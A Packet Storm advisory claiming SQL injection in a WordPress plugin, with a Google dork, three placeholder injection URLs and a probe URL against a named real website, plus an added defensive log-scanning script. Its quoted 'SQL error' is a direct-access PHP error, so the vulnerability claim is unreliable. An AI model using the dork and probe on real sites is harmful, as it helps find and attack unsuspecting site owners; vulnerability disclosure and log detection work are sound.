WordPress Add Code To Head upsite_analytics_plugin 1.13 SQL Injection

2019-01-28T00:00:00
ID PACKETSTORM:151349
Type packetstorm
Reporter KingSkrupellos
Modified 2019-01-28T00:00:00

Description

                                        
####################################################################  
  
# Exploit Title : WordPress Add Code To Head upsite_analytics_plugin Plugins 1.13 SQL Injection  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 28/01/2019  
# Vendor Homepage : hbjitney.com  
# Software Download Link : downloads.wordpress.org/plugin/add-code-to-head.zip  
# Software Information Link : wordpress.org/plugins/add-code-to-head/  
# Software Version : 1.13  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/wp-content/plugins/upsite_analytics_plugin/''  
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]  
  
####################################################################  
  
# Description :  
***************  
  
WordPress Add Code To Head upsite_analytics_plugin is open source software for WordPress.  
  
####################################################################  
  
# Impact :  
***********  
  
* WordPress Add Code To Head upsite_analytics_plugin Plugins 1.13 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.  
  
* Exploiting this issue could allow an attacker to compromise the application, read, access or modify data, or exploit latent vulnerabilities in the underlying database. If the webserver is misconfigured, read & write access to the filesystem may be possible.  
  
####################################################################  
  
# SQL Injection Exploit :  
**********************  
  
/wp-content/plugins/upsite_analytics_plugin/add-code-to-head.php?id=[SQL Injection]  
  
/wp-content/plugins/upsite_analytics_plugin/plugin-updates/github-checker.php?id=[SQL Injection]  
  
/wp-content/plugins/upsite_analytics_plugin/uninstall.php?id=[SQL Injection]  
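  
As an added example that is not part of this advisory, the following Python scans web server access logs for requests to the three plugin paths above whose `id` parameter is anything other than a plain integer, which catches probes such as the `id=1%27` request shown in this advisory. The log lines, client addresses and host are constructed for the example.  
  
```python
"""Flag non-numeric 'id' values sent to the upsite_analytics_plugin paths.

Added example, not from the advisory or the plugin. Sample log lines below
are constructed (RFC 5737 test addresses).
"""
import re
from urllib.parse import parse_qs, urlsplit

PLUGIN_PREFIX = "/wp-content/plugins/upsite_analytics_plugin/"

# Apache/nginx combined log format: client, timestamp, request line, status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def suspicious_id(value: str) -> bool:
    """True when a decoded 'id' value is anything other than a bare integer."""
    return not re.fullmatch(r"\d+", value)

def scan_access_log(lines):
    """Return (ip, timestamp, path, decoded id) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line; skip it
        parts = urlsplit(m["target"])
        if not parts.path.startswith(PLUGIN_PREFIX):
            continue  # only the plugin's own PHP files are of interest
        # parse_qs percent-decodes once, so %27 becomes a literal quote here
        for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
            if suspicious_id(value):
                hits.append((m["ip"], m["ts"], parts.path, value))
    return hits

# Constructed sample log: one benign plugin request, two probes, two unrelated requests
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Jan/2019:10:15:01 +0000] "GET /wp-content/plugins/upsite_analytics_plugin/add-code-to-head.php?id=1 HTTP/1.1" 200 512',
    '192.0.2.77 - - [28/Jan/2019:10:15:03 +0000] "GET /wp-content/plugins/upsite_analytics_plugin/add-code-to-head.php?id=1%27 HTTP/1.1" 500 1208',
    '192.0.2.77 - - [28/Jan/2019:10:15:04 +0000] "GET /wp-content/plugins/upsite_analytics_plugin/uninstall.php?id=1%20AND%201%3D1 HTTP/1.1" 500 1208',
    '192.0.2.20 - - [28/Jan/2019:10:16:00 +0000] "GET /wp-content/plugins/other-plugin/page.php?id=%27 HTTP/1.1" 200 300',
    '192.0.2.30 - - [28/Jan/2019:10:16:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("suspicious:", hit)
```
  
Pair the hits with the 500 status codes the plugin returns on direct access, as in the error quoted further down, to separate probing from ordinary page loads.  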
  
####################################################################  
  
# Example Vulnerable Site :  
*************************  
  
[+] tramhaltevenlo.nl/wp-content/plugins/upsite_analytics_plugin/add-code-to-head.php?id=1%27  
  
####################################################################  
  
# SQL Database Error :  
********************  
  
Fatal error: Uncaught Error: Call to undefined function wp_die() in /home/tramhaltevenlo/public_html/wp-content/plugins/upsite_analytics_plugin/uninstall.php:9  
Stack trace: #0 {main} thrown in /home/tramhaltevenlo/public_html/wp-content/plugins/upsite_analytics_plugin/uninstall.php on line 9  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  